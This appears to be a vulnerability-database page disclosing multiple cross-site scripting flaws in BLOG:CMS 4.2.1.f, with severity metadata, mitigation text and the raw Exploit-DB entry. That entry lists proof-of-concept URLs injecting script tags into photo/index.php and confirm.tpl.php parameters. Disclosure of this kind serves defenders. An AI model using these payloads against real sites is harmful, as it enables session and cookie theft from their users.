header-logo
Suggest Exploit
vendor:
BLOG:CMS
by:
5.5
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: BLOG:CMS
Affected Version From: 4.2.1.f
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:blogcms:blogcms:4.2.1.f
Metasploit:
Other Scripts:
Platforms Tested:

BLOG:CMS Multiple Cross-Site Scripting Vulnerabilities

BLOG:CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

The vendor should release a patch or update to properly sanitize user-supplied input to prevent cross-site scripting vulnerabilities. In the meantime, users can mitigate the risk by avoiding untrusted or malicious inputs.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48132/info

BLOG:CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

BLOG:CMS 4.2.1.f is vulnerable; other versions may also be affected. 

http://www.example.com/blogcms/photo/index.php?"<script>alert(0x0029A)</script>
http://www.example.com/blogcms/photo/index.php?"<script>alert(&#039;XSS&#039;);</script>

http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(&#039;XSS&#039;);</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0x0029A)</script>

http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php